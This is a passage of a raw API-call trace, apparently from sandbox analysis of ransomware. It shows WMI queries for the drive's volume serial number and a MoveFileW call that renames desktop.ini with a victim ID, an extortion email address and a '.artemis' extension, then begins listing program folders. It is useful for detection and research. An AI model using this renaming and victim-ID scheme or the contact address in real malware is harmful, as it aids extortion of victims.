WbemDefPath:IUnknown:QueryInterface (in: This=0x6736dc8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee778 | out: ppvObject=0x6cee778*=0x0) returned 0x80004002 [0148.098] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736dc8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee78c | out: ppvObject=0x6cee78c*=0x6738230) returned 0x0 [0148.098] WbemDefPath:IUnknown:Release (This=0x6736dc8) returned 0x0 [0148.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3ac | out: ppvObject=0x6cee3ac*=0x6738230) returned 0x0 [0148.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee368 | out: ppvObject=0x6cee368*=0x0) returned 0x80004002 [0148.099] WbemDefPath:IUnknown:AddRef (This=0x6738230) returned 0x3 [0148.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedcc4 | out: ppvObject=0x6cedcc4*=0x0) returned 0x80004002 [0148.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc74 | out: ppvObject=0x6cedc74*=0x0) returned 0x80004002 [0148.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc80 | out: ppvObject=0x6cedc80*=0x77dc08) returned 0x0 [0148.099] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedc88 | out: pCid=0x6cedc88*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.099] WbemDefPath:IUnknown:Release (This=0x77dc08) returned 0x3 [0148.099] CoGetContextToken (in: pToken=0x6cedce0 | out: pToken=0x6cedce0) returned 0x0 [0148.099] CoGetContextToken (in: pToken=0x6cee0e8 | out: pToken=0x6cee0e8) returned 0x0 [0148.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee178 | out: ppvObject=0x6cee178*=0x0) returned 0x80004002 [0148.099] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x2 [0148.099] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x1 [0148.099] CoGetContextToken (in: pToken=0x6ceea70 | out: pToken=0x6ceea70) returned 0x0 [0148.099] CoGetContextToken (in: pToken=0x6cee9d0 | out: pToken=0x6cee9d0) returned 0x0 [0148.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x6ceeaa0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceea9c | out: ppvObject=0x6ceea9c*=0x6738230) returned 0x0 [0148.099] WbemDefPath:IUnknown:AddRef (This=0x6738230) returned 0x3 [0148.099] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x2 [0148.100] WbemDefPath:IWbemPath:SetText (This=0x6738230, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0148.100] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738230, puCount=0x6ceec20 | out: puCount=0x6ceec20*=0x2) returned 0x0 [0148.100] WbemDefPath:IWbemPath:GetText (in: This=0x6738230, lFlags=4, puBuffLength=0x6ceec1c*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec1c*=0xf, pszText=0x0) returned 0x0 [0148.100] WbemDefPath:IWbemPath:GetText (in: This=0x6738230, lFlags=4, puBuffLength=0x6ceec1c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceec1c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.100] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec20 | out: ppv=0x6ceec20*=0x72015c) returned 0x0 [0148.100] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec18 | out: pAptType=0x6ceec18*=1) returned 0x0 [0148.100] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec1c | out: ppvObject=0x6ceec1c*=0x0) returned 0x80004002 [0148.100] IUnknown:Release (This=0x72015c) returned 0x1 [0148.101] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee840 | out: ppv=0x6cee840*=0x672f388) returned 0x0 [0148.101] WbemLocator:IUnknown:QueryInterface (in: This=0x672f388, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ceea58 | out: ppvObject=0x6ceea58*=0x0) returned 0x80004002 [0148.101] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f388, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ceea6c | out: ppvObject=0x6ceea6c*=0x6736db8) returned 0x0 [0148.101] WbemLocator:IUnknown:Release (This=0x672f388) returned 0x0 [0148.101] WbemLocator:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee68c | out: ppvObject=0x6cee68c*=0x6736db8) returned 0x0 [0148.101] WbemLocator:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee648 | out: ppvObject=0x6cee648*=0x0) returned 0x80004002 [0148.101] WbemLocator:IUnknown:AddRef (This=0x6736db8) returned 0x3 [0148.101] WbemLocator:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedfa4 | out: ppvObject=0x6cedfa4*=0x0) returned 0x80004002 [0148.101] WbemLocator:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedf54 | out: ppvObject=0x6cedf54*=0x0) returned 0x80004002 [0148.101] WbemLocator:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedf60 | out: ppvObject=0x6cedf60*=0x0) returned 0x80004002 [0148.101] CoGetContextToken (in: pToken=0x6cedfc0 | out: pToken=0x6cedfc0) returned 0x0 [0148.102] CoGetContextToken (in: pToken=0x6cee3c8 | out: pToken=0x6cee3c8) returned 0x0 [0148.102] WbemLocator:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee458 | out: ppvObject=0x6cee458*=0x0) returned 0x80004002 [0148.102] WbemLocator:IUnknown:Release (This=0x6736db8) returned 0x2 [0148.102] WbemLocator:IUnknown:Release (This=0x6736db8) returned 0x1 [0148.102] CoGetContextToken (in: pToken=0x6ceea38 | out: pToken=0x6ceea38) returned 0x0 [0148.102] CoGetContextToken (in: pToken=0x6cee998 | out: pToken=0x6cee998) returned 0x0 [0148.102] WbemLocator:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x6ceea68*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ceea64 | out: ppvObject=0x6ceea64*=0x6736db8) returned 0x0 [0148.102] WbemLocator:IUnknown:AddRef (This=0x6736db8) returned 0x3 [0148.102] WbemLocator:IUnknown:Release (This=0x6736db8) returned 0x2 [0148.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738230, puCount=0x6ceebfc | out: puCount=0x6ceebfc*=0x2) returned 0x0 [0148.102] WbemDefPath:IWbemPath:GetText (in: This=0x6738230, lFlags=8, puBuffLength=0x6ceebf8*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebf8*=0xf, pszText=0x0) returned 0x0 [0148.102] WbemDefPath:IWbemPath:GetText (in: This=0x6738230, lFlags=8, puBuffLength=0x6ceebf8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebf8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.102] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceead4 | out: ppv=0x6ceead4*=0x6736da8) returned 0x0 [0148.102] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736da8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeb68 | out: ppNamespace=0x6ceeb68*=0x673721c) returned 0x0 [0149.024] WbemLocator:IUnknown:QueryInterface (in: This=0x673721c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ceea04 | out: ppvObject=0x6ceea04*=0x781274) returned 0x0 [0149.024] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781274, pProxy=0x673721c, pAuthnSvc=0x6ceea54, pAuthzSvc=0x6ceea50, pServerPrincName=0x6ceea48, pAuthnLevel=0x6ceea4c, pImpLevel=0x6ceea3c, pAuthInfo=0x6ceea40, pCapabilites=0x6ceea44 | out: pAuthnSvc=0x6ceea54*=0xa, pAuthzSvc=0x6ceea50*=0x0, pServerPrincName=0x6ceea48, pAuthnLevel=0x6ceea4c*=0x6, pImpLevel=0x6ceea3c*=0x2, pAuthInfo=0x6ceea40, pCapabilites=0x6ceea44*=0x1) returned 0x0 [0149.024] WbemLocator:IUnknown:Release (This=0x781274) returned 0x1 [0149.025] WbemLocator:IUnknown:QueryInterface (in: This=0x673721c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9f8 | out: ppvObject=0x6cee9f8*=0x781294) returned 0x0 [0149.025] WbemLocator:IUnknown:QueryInterface (in: This=0x673721c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9f4 | out: ppvObject=0x6cee9f4*=0x781274) returned 0x0 [0149.025] WbemLocator:IClientSecurity:SetBlanket (This=0x781274, pProxy=0x673721c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0149.025] WbemLocator:IUnknown:Release (This=0x781274) returned 0x2 [0149.025] WbemLocator:IUnknown:Release (This=0x781294) returned 0x1 [0149.025] CoTaskMemFree (pv=0x77e058) [0149.025] WbemLocator:IUnknown:Release (This=0x6736da8) returned 0x0 [0149.289] WbemLocator:IUnknown:QueryInterface (in: This=0x673721c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5f4 | out: ppvObject=0x6cee5f4*=0x781294) returned 0x0 [0149.289] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5b0 | out: ppvObject=0x6cee5b0*=0x0) returned 0x80004002 [0150.773] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee3cc | out: ppvObject=0x6cee3cc*=0x0) returned 0x80004002 [0150.777] WbemLocator:IUnknown:AddRef (This=0x781294) returned 0x3 [0150.778] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf0c | out: ppvObject=0x6cedf0c*=0x0) returned 0x80004002 [0150.779] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedebc | out: ppvObject=0x6cedebc*=0x0) returned 0x80004002 [0150.780] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedec8 | out: ppvObject=0x6cedec8*=0x7811f4) returned 0x0 [0150.780] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7811f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6ceded0 | out: pCid=0x6ceded0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0150.780] WbemLocator:IUnknown:Release (This=0x7811f4) returned 0x3 [0150.780] CoGetContextToken (in: pToken=0x6cedf28 | out: pToken=0x6cedf28) returned 0x0 [0150.780] CoGetContextToken (in: pToken=0x6cee330 | out: pToken=0x6cee330) returned 0x0 [0150.780] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3c0 | out: ppvObject=0x6cee3c0*=0x78127c) returned 0x0 [0150.781] WbemLocator:IRpcOptions:Query (in: This=0x78127c, pPrx=0x781294, dwProperty=2, pdwValue=0x6cee3e8 | out: pdwValue=0x6cee3e8) returned 0x80004002 [0150.781] WbemLocator:IUnknown:Release (This=0x78127c) returned 0x3 [0150.781] WbemLocator:IUnknown:Release (This=0x781294) returned 0x2 [0150.781] CoGetContextToken (in: pToken=0x6cee908 | out: pToken=0x6cee908) returned 0x0 [0150.781] CoGetContextToken (in: pToken=0x6cee868 | out: pToken=0x6cee868) returned 0x0 [0150.781] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x6cee938*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee934 | out: ppvObject=0x6cee934*=0x673721c) returned 0x0 [0150.781] WbemLocator:IUnknown:AddRef (This=0x673721c) returned 0x4 [0150.781] WbemLocator:IUnknown:Release (This=0x673721c) returned 0x3 [0150.781] WbemLocator:IUnknown:Release (This=0x673721c) returned 0x2 [0150.781] SysStringLen (param_1=0x0) returned 0x0 [0150.781] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67382a0, puCount=0x6ceeccc | out: puCount=0x6ceeccc*=0x0) returned 0x0 [0150.781] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=2, puBuffLength=0x6ceecc8*=0x0, pszText=0x0 | out: puBuffLength=0x6ceecc8*=0x20, pszText=0x0) returned 0x0 [0150.781] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=2, puBuffLength=0x6ceecc8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceecc8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0150.781] CoGetContextToken (in: pToken=0x6cee938 | out: pToken=0x6cee938) returned 0x0 [0150.781] WbemLocator:IUnknown:AddRef (This=0x781294) returned 0x3 [0150.781] WbemLocator:IUnknown:QueryInterface (in: This=0x781294, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7cc | out: ppvObject=0x6cee7cc*=0x781294) returned 0x0 [0150.781] WbemLocator:IUnknown:Release (This=0x781294) returned 0x3 [0150.781] WbemLocator:IUnknown:Release (This=0x781294) returned 0x2 [0150.782] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=2, puBuffLength=0x6ceecd0*=0x0, pszText=0x0 | out: puBuffLength=0x6ceecd0*=0x20, pszText=0x0) returned 0x0 [0150.782] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=2, puBuffLength=0x6ceecd0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceecd0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0150.782] IWbemServices:GetObject (in: This=0x673721c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceec84*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceec84*=0x673b2d0, ppCallResult=0x0) returned 0x0 [0152.409] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738230, puCount=0x6ceec84 | out: puCount=0x6ceec84*=0x2) returned 0x0 [0152.409] WbemDefPath:IWbemPath:GetText (in: This=0x6738230, lFlags=4, puBuffLength=0x6ceec80*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec80*=0xf, pszText=0x0) returned 0x0 [0152.409] WbemDefPath:IWbemPath:GetText (in: This=0x6738230, lFlags=4, puBuffLength=0x6ceec80*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceec80*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0152.409] IWbemClassObject:Get (in: This=0x673b2d0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceec80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350842c*=0, plFlavor=0x3508430*=0 | out: pVal=0x6ceec80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350842c*=8, plFlavor=0x3508430*=0) returned 0x0 [0152.409] SysStringByteLen (bstr="9C354B42") returned 0x10 [0152.409] SysStringByteLen (bstr="9C354B42") returned 0x10 [0152.409] IWbemClassObject:Get (in: This=0x673b2d0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceec88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350842c*=8, plFlavor=0x3508430*=0 | out: pVal=0x6ceec88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350842c*=8, plFlavor=0x3508430*=0) returned 0x0 [0152.409] SysStringByteLen (bstr="9C354B42") returned 0x10 [0152.409] SysStringByteLen (bstr="9C354B42") returned 0x10 [0152.409] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6cee888, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0152.409] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee888, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x4d [0152.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceece8) returned 1 [0152.410] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x6ceed64 | out: lpFileInformation=0x6ceed64*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0152.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceece4) returned 1 [0152.410] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), lpNewFileName="C:\\Program Files (x86)\\desktop.ini.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\desktop.ini.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0152.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceee1c) returned 1 [0152.411] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe", nBufferLength=0x105, lpBuffer=0x6cee924, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe", lpFilePart=0x0) returned 0x1c [0152.411] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\", nBufferLength=0x105, lpBuffer=0x6cee8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\", lpFilePart=0x0) returned 0x1d [0152.411] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*", lpFindFileData=0x6ceeb44 | out: lpFindFileData=0x6ceeb44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b1f0 [0152.411] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xdbcb06e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcb06e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0152.411] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ffba80, ftCreationTime.dwHighDateTime=0x1d5765c, ftLastAccessTime.dwLowDateTime=0xc770d040, ftLastAccessTime.dwHighDateTime=0x1d5889d, ftLastWriteTime.dwLowDateTime=0xc770d040, ftLastWriteTime.dwHighDateTime=0x1d5889d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aldelo.exe", cAlternateFileName="")) returned 1 [0152.411] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c72a30, ftCreationTime.dwHighDateTime=0x1d57e7b, ftLastAccessTime.dwLowDateTime=0x7d642d50, ftLastAccessTime.dwHighDateTime=0x1d5c9d2, ftLastWriteTime.dwLowDateTime=0x7d642d50, ftLastWriteTime.dwHighDateTime=0x1d5c9d2, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="far.exe", cAlternateFileName="")) returned 1 [0152.411] FindNextFileW (in: hFindFile=0x77b1f0, lpFindFileData=0x6ceeb54 | out: lpFindFileData=0x6ceeb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, 